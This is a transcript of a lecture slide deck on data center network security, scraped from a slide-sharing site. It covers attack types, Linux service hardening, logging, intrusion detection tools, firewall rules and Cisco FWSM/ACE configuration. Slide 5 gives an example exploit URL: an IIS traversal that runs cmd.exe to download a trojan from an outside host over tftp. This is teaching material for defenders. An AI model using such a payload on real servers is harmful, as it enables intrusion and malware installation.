1 / 50

Data Center Network Security

Data Center Network Security. History. Old days – security = planting two firewalls Today – security = very complex problem. Type of attacks. Atacks on networks became more sophisticated and are carried through, but not limited to, one of the following techniques:

Download Presentation

Data Center Network Security

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Data Center Network Security

  2. History • Old days – security = planting two firewalls • Today – security = very complex problem

  3. Type of attacks • Atacks on networks became more sophisticated and are carried through, but not limited to, one of the following techniques: • Packet sniffing— An application that uses the promiscuous mode of the network adapter to capture all networks packets. • IP spoofing— An attack in which a hacker assumes an IP address of others to conceal its true identity • Denial-of-service (DoS) attack— Aims to overwhelm a service so as to deny legitimate requests from being serviced. The service may be in the form of bandwidth, memory, or CPU. It is the most well-known of all Internet attacks, and efforts should be invested in understanding its mechanisms. Some of the more famous DoS attacks include the following: • Code Red • Blaster • Ping of Death • Trinity

  4. Type of attacks • Password attack— As its name implies, this attack intends to acquire passwords to important assets so as to cause further damage. Password attacks can be achieved through other methods previously mentioned, such as IP spoofing, or they can be achieved via brute force • Man-in-the-middle attack— This type of attack happens when a hacker manages to position himself between the source and the destination of a network transaction. ARP cache poisoning is one common method • Application attack— This type of attack happens when application software holes are exploited to gain access to a computer system. The holes may be bugs or may be TCP port numbers that are exposed • Port redirection attack— This type of attack makes use of a compromised host to gain access to a network that is otherwise protected

  5. Typical Intrusion SequenceHacking the Web/Application Server • After a phase of probing/scanning, the hacker detects the vulnerability of the web/application server • The hacker exploits the vulnerability to get a shell • For example: • Copy the Trojan on the web/application server: • HTTPS://www.example.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2010.20.15.15%20GET%20trojan.exe%20trojan.exe

  6. Automated Intrusion Sequence—Blaster Ex.

  7. Attack Patterns

  8. Server Farm Security Strategies

  9. Segmenting the Server Farm

  10. Building the Firewall Ruleset

  11. From Physical Separationto Logical Separation

  12. Avoid Break-ins in Linux • To save on system resources and make system administration less complex, many services are handled through a configuration file /etc/inetd.conf. This file tells the system how to run each of the available services. • Many Linux vendors turn on various services in inetd.conf by default when for maximum security they should be off! • In many corporate environments security as such is not an issue. If there is enough security to prevent accidental damage in these 'soft' environments providing access to these services is more important than preventing them.

  13. Avoid Break-ins in Linux • If your Linux host is exposed to the Internet you may hold a different point of view though. To check what services are currently running on your Linux system, type the command • netstat -vat • This will print up something like this tcp 0 0 *:6000 *:* LISTEN tcp 0 0 *:www *:* LISTEN tcp 0 0 *:auth *:* LISTEN tcp 0 0 *:finger *:* LISTEN tcp 0 0 *:shell *:* LISTEN tcp 0 0 *:sunrpc *:* LISTEN • Each line that says LISTEN is a service waiting for connections.

  14. Avoid Break-ins in Linux • Some of these services run as stand-alone programs, but many of them are controlled by /etc/inetd.conf. If you are not sure what a service does, look it up in /etc/inetd.conf. For instance, if you type • grep '^finger' /etc/inetd.conf • you will get back a line from inetd.conf like this • finger stream tcp nowait nobody /usr/sbin/tcpd /usr/sbin/in.fingerd

  15. Avoid Break-ins in Linux • To see what the program does, look up in.fingerd in the man page. • If you think you can live without this service, then it can be turned off in /etc/inetd.conf. • By commenting out the line (put a # at the start of the line) and then issuing the command kill all -HUP inetd you can immediately and permanently turn a service off. There is no need to reboot.

  16. Avoid Break-ins in Linux • If a service is not listed in /etc/inetd.conf then it probably runs as a stand-alone program. • You can remove a service provided by a stand-alone background program by uninstalling its package. Only do this if you are sure about what the program does and are certain that it is not necessary.

  17. SSH • To add extra security to the various services, Linux has a system for allowing and denying them to chosen hosts. For instance, you may wish to allow logins from machines at your own site, but not from the Internet. The files /etc/hosts.allow and /etc/hosts.deny list allowed services and hosts.

  18. SSH • The method of denying connections by checking the host provides a good basic method for throwing off attacks. • It is not the end of the story. • It is possible to fake host names on incoming connections ( oh yes it is ). • While data is in transit between programs over the Internet it is also in danger. Anyone with the knowledge can look at your data. Using a method known as 'spoofing' they can even inject fake data into a legitimate stream. • These problems come about because of the way that Internet protocols interact. To overcome these difficulties ssh was devised.

  19. SSH • Ssh is a stable, well-developed system with open source that provides encryption and authentication on connections. • Encryption is using codes to protect the packets of data while in transit. • Authentication is a process for verifying if a.packet of data or a connection is valid. • There are ssh clients for most other operating systems too. • By using Linux as a server you can provide ssh level security for all your network use.

  20. Logging • Linux has a comprehensive set of subsystems to let the systems administrator know what is going on with his or her system. • All manner of log files are generally kept in the /var/log directory. • Most of the standard services log information to /var/log/syslog and /var/log/messages about users connecting to them or attempting to connect. • There are also log files for such services as apache (/var/log/httpd/access_log), mail (/var/log/mail) and firewall (/var/log/firewall).

  21. Logging • The main problem with logging events is that one tends to end up with too much data. • Careful filtering and only logging important information is important.

  22. Logging • There are some good tools out there that will make this work easier. • Ethereal is a packet sniffer • With it you can capture various types of packets over a given period of time. • It also shows all manner of information about the packets. • It's useful for watching packets coming into and going out of your machine. • Generally it will detect traffic on your network segment.

  23. Logging • Another logging/intrusion detection type tool is called Tripwire. • It takes a snapshot of your important system files and records their signature in a database. • Various signature levels are available from mild to wild. • You can also set the rules in a policy file to tell Tripwire what to check. • After the database is initialized and signed Tripwire can be executed whenever you need to check the integrity of your system. • The report will point out when your files are changed and the severity of the security risk. The Tripwire report is pretty easy to read and can be customized according to your file tracking needs.

  24. Logging • A popular program for detecting access attempts (via the network) and port scans is Snort. • The program produces files that log these types of activities and even gives some idea of where to find out more information. • The same problem as with other log files. It gets tough for a busy system administrator to review all the log files on a regular basis

  25. Firewalls • A firewall is a device that protects a private network from the wider Internet. • The simplest form of firewall is a Linux machine with one network connection ( an Ethernet card or modem ) connected to the Internet and the other connected to the private network. • The Firewall computer can reach the protected network and the Internet. • This traffic between the protected network and the Internet is controlled, in both directions by a list of rules. • These rules can be customized for your needs. • CoyoteLinux.com has a firewall system that fits on a floppy and doesn't need a hard disk to run. It's design specifically to address the need for an easy to install no-nonsense Linux firewall

  26. Firewalls • All data flowing to and from the Internet and the private network is filtered by the firewall. • Inside the private network less care needs to be taken with turning off services and the like. • It is a way of concentrating effort on making one machine secure and protecting many others in the process. • The methods for correctly setting up firewalls are quite complex. • First you have to configure your machine for two Ethernet cards. • Then you have to use the IP-chains/IP-tables software to set up filters which connect the two Ethernet cards data links.

  27. Firewalls • The main drawback with making your systems more secure is that they become less accessible. • The idea behind ramping up your system's security is to stop use of your computers, by crooks, thieves and malcontents but let the legitimate users use the system

  28. Tools • Tools for defense can be grouped into four categories: • log monitoring • connection monitoring • host based intrusion detection • network based intrusion detection

  29. Log Monitoring • These tools will watch over your log files and help you detect security related events (actually, based on the rules, you can have them detect any type of event). Either by default, or through configuration, they can e-mail you the alerts. • autobuse • logcheck • Logwatch • swatch

  30. Connection Monitoring • When connected to the internet, unless a firewall is in place, other systems can connect to yours. These tools will help you know who is connecting to your box, even to the point of detecting stealth scans that normal logging will not catch. • ippl • jail • klaxon • portsentry • tcplogd

  31. Host based intrusion detection • These days, it's often difficult to know if an intrusion has taken place. Upon successfully gaining root privilege, an intruder will often erase the logs of the break-in. Quite often, they will take an additional step of installing a set of trojan binaries known as a rootkit. These tools help to detect the intrusion, sometimes even after the intruder has gained root access. • hostsentry • Tripwire • ViperDB

  32. Network based intrusion detection • These tools will help detect intrusions (or intrusion attempts) across your entire network, not just on individual hosts. They will look at the traffic and attempt to match known attack patterns and notify you if an attack is seen. • Network Flight Recorder • SHADOW • snort

  33. Linux Firewalls • Linux Firewalls • * Define a Network Security Policy • * Use a Secure Linux Distro for your firewall • * Harden your firewall • o Install the minimum number of packages • o Turn all unused services off • o Disallow user logins • * Define a set of Firewall Rules • * Define egress and ingress filters • * You'd probably need to IPMasquerade or NAT • o Allows internal machine to get out on the net • o Outside world see these internal machines as www.foo.com • * Start with existing/proven/simple Example Firewall configurations • * Test your Firewall from the inside and outside • o Apply all known Exploits and vulnerabilities • o Apply all known Hacking Tools and attacks • o Apply all known Rootkits • Installing a Firewall does NOT solve the "security" problem

  34. Linux Firewall Rules • Firewall Rules • SecurityFocus.net • Example Firewall Scripts • Linux-Sec.net/FW/Scripts Example Firewall Scripts • General Firewall Rules • * Turn on ingress and egress Rules • * Turn on/off various /proc options • * Outgoing Rules • Allow all internal PCs to freely access the Internet • * Incoming Rules • Allow incoming DNS requests to the DNS server • Allow incoming SMTP requests to the mail server • Allow incoming HTTP requests to the web server • Allow incoming FTP requests to the ftp server • Allow incoming ssh requests to the ssh server • Allow incoming wireless requests to the wireless gw server • Allow incoming ppp requests to the ppp gw server • Allow incoming secure pop3/imap requests to the secure pop server • Allow incoming authenticated vpn requests to the vpn server • Disallow messenger.msn.com • Disallow oscar.aol.com • Disallow messenger.yahoo.com (IIRC)

  35. Linux Firewall Rules • NAT Rules • IP Masquerade • E-InfoMax.com IPMasquerade • IPMasq.cjb.net IP_Masuerade-HOWTO • LinuxDoc.org IP_Masquerade-HOWTO • CSUChico.edu • 3-line IP Masquerade • LinuxDoc.org • ipchains -P forward DENY • ipchains -A forward -i ppp0 -j MASQ • echo 1 > /proc/sys/net/ipv4/ip_forward • Egress and Ingress Filtering • * Ingress Filtering: incoming network traffic entering your LAN • IETF.org RFC2827.txt • Sans.org Packet_filter - ingress/egress • Sans.org Firewall Issues • * Egress Filtering: outoging network traffic leaving your LAN • Sans.org Top Ten Blocking Recommendations Using IPChains • Sans.org ipchains Egress Rules • Sans.org Egress Filtering - cisco • Sans.org Egress Filtering ( same as above ) • Incidents.org Egress - cicso

  36. Linux Firewall Rules • Cisco ACLs • Firewalls/HowTo/#Cisco Cisco ACLs • Proxy Server Rules • HiSecure Proxy(?) • tcpr ftp and telnet forwarder • COAST udprelay • Dec.com XForward • ReDir port redirector • Reverse Pimpage Revision remotely access machines behind a firewall • Reverse Utilities telnet/http/ssh access to machines behind a firewall • * Sock5 • SourceForge.net Tsocks • SourceForge.net socksd • inet.no • inet.no dante • Umich.edu nylon • SolSoft NSM proxy-based firewall • httpf filters out java, js, etc • tproxy • Squid-Cache.org • * TIS Proxy Server

  37. Data Center Firewalls • FWSM • Protocol support • Syslog • Management tools • DoS protection

  38. ACE • ACE = Application control engine • provides application and network operations management with new levels of control over the way they deploy, operate, deliver, secure and manage their applications and business services across the extended enterprise. It helps enable greater control over the application infrastructure, allowing organizations to quickly deploy and migrate applications, delivering the highest levels of services to the end user while simplifying the overall management and operation of a data center.

  39. FWSM • FWSM = Firewall Service Module

  40. MARS • MARS = Monitoring, Analysis and Response System

  41. Data Center Firewalls • ACE • Integrated SLB and SSL • High capacity • Failover group per context • Failover tracking by HSRP, interface, IP address • Autostate aware • Role based access control • Configuration rollback marking • Bridge-mode: interface pairs per context • Advanced http inspection: mime/regex

  42. ACE—FWSM Security Comparison • Access Lists • Inspection Engines • Timeouts • Private VLANs • Role Based Access Control • Failover • Resource Allocation • Configuration Rollback • VLAN Assignments

  43. Stateful ACLs—Bridge Mode Context • FWSM 3.1 • firewall transparent • access-list BPDU ethertype permit bpdu • access-list blue extended permit ip any any • interface Vlan104 • nameif outside • bridge-group 1 • security-level 0 • interface Vlan40 • nameif inside • bridge-group 1 • security-level 100 • interface BVI1 • ip address 12.20.40.4 255.255.255.0 standby 12.20.40.5 • access-group BPDU in interface outside • access-group blue in interface outside • access-group BPDU in interface inside • access-group blue in interface inside • route outside 0.0.0.0 0.0.0.0 12.20.40.1 1 • ACE Note: ACE Loggin Phase 2 • access-list BPDU ethertype permit bpdu • access-list blue extended permit ip any any • interface vlan 104 • bridge-group 1 • access-group input BPDU • access-group input blue • no shutdown • interface vlan 204 • bridge-group 1 • access-group input BPDU • access-group input blue • no shutdown • interface bvi 1 • ip address 12.20.40.6 255.255.255.0 • alias 12.20.40.8 255.255.255.0 • peer ip address 12.20.40.7 255.255.255.0 • no shutdown • ip route 0.0.0.0 0.0.0.0 12.20.40.1

  44. Inspection Compared

  45. HTTP Inspection • RFC 2616 compliance and filtering • Protocol Conformance: The 1st line of a request is "Method SP" and that of response is “HTTP-Version SP”, etc. • De-obfuscation: Override attempts to avoid regex searches by encoding the URL • Methods: OPTIONS, GET, POST, HEAD, PUT, DELETE, TRACE, CONNECT • Extensions: INDEX, MOVE, MKDIR, COPY, EDIT, UNEDIT, SAVE, LOCK, NLOCK, REVLABEL, REVLOG, REVNUM, • SETATTRIBUTE, GETATTRIBUTE, GETATTRIBUTENAMES, GETPROPERTIES, STARTREV, STOPREV • Length and encoding checks • Length: Configurable range for URL and URL Header requests and responses • Encoding: chunked | compress | deflate | gzip | identity • Detect HTTP misuse • Peer-to-peer (p2p) applications: Kazaa, Gnutella • Tunneling applications: HTTPort/HTTHost, FireThru • Instant Messaging: (IMI—YAHOO Messenger) • MIME type validation and filtering (ACE only) • Audio: /*, /midi, /basic, /mpeg, /x-adpcm, /x-aiff, /x-ogg, x-wav (8) • Image: /*, /cgf, /gif, /jpeg, /png, /tiff, /x-3ds, /x-bitmap, /x-niff, /x-portable, /x-xpm (11) • Text: /*, /css, /html, /plain, /richtext, /sgml, /xmcd, /xml (8 • Video: /*, /-flc, /mpeg, /quicktime, /sgi, /x-avi, /x-fli, /x-mng, /x-msvideo (9) • Application: /msword, /octet-stream, /pdf, /postscript, /vnd.ms-excel, /vnd.ms-powerpoint, /x-gzip, /x-java-archive, • /x-java-vm, /zip (10) • Regex filtering on HTTP messages (ACE only) • Detect protocol running on top of HTTP, i.e., to detect Yahoo Messenger, look for YMSG in the first 4 bytes

  46. HTTP Inspection Ex.—Allow Only GETs

  47. Timeouts per Flow FWSM 3.1 class-map TN3270-class match port tcp eq 23 policy-map TN3270-policy class TN3270-class set connection timeout embryonic 0:00:30 half-closed 0:10:00 tcp 24:00:00 service-policy TN3270-policy interface inside ACE parameter-map type connection TN3270 set timeout inactivity 86400 class-map match-all TN3270-class 2 match port tcp eq telnet policy-map multi-match TN370-policy class TN3270-class connection advanced-options TN3270 interface vlan 307 service-policy input TN370-policy

  48. Private VLANs with Service Modules

  49. Role-Based Access with ACE

  50. Customizing Roles and Domains with ACE

More Related